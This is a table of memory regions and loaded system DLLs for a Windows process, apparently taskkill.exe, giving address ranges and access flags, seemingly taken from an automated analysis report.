| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00210000 | 0x00276fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000290000 | 0x00290000 | 0x00290fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x00547fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x01adffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001b00000 | 0x01b00000 | 0x01b7ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x01b80000 | 0x01c3ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000001c80000 | 0x01c80000 | 0x01cfffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d20000 | 0x01d20000 | 0x01d9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e30000 | 0x01e30000 | 0x01eaffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01eb0000 | 0x0217efff | Memory Mapped File | Readable |
|
|
|
|
| user32.dll | 0x775e0000 | 0x776d9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x776e0000 | 0x777fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77800000 | 0x779a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| taskkill.exe | 0xff2a0000 | 0xff2befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x7fee02f0000 | 0x7fee0414fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x7fef1d30000 | 0x7fef1d7bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x7fef50d0000 | 0x7fef50defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x7fef5240000 | 0x7fef52c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x7fef9730000 | 0x7fef9747fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x7fefbb00000 | 0x7fefbb14fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x7fefbb20000 | 0x7fefbb2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x7fefbb30000 | 0x7fefbb45fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x7fefbec0000 | 0x7fefbed0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x7fefc910000 | 0x7fefc91bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x7fefcd40000 | 0x7fefcd86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x7fefd040000 | 0x7fefd056fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x7fefd540000 | 0x7fefd562fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x7fefd5e0000 | 0x7fefd5eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x7fefd610000 | 0x7fefd634fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x7fefd640000 | 0x7fefd64efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x7fefd6f0000 | 0x7fefd72cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x7fefd730000 | 0x7fefd743fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x7fefd9d0000 | 0x7fefda3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x7fefdb40000 | 0x7fefdb6dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x7fefdd50000 | 0x7fefddeefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x7fefde70000 | 0x7fefdf46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x7fefdf50000 | 0x7fefdf5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x7fefe1c0000 | 0x7fefe3c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x7fefe550000 | 0x7fefe5e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x7fefe5f0000 | 0x7fefe63cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x7fefe640000 | 0x7fefe76cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x7fefe770000 | 0x7fefe7e0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x7feff710000 | 0x7feff818fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x7feff8c0000 | 0x7feff8defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x7feff8e0000 | 0x7feff9bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x7feff9c0000 | 0x7feff9c7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x7feff9d0000 | 0x7feffa36fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x7feffa40000 | 0x7feffb08fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x7feffb20000 | 0x7feffb20fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
|
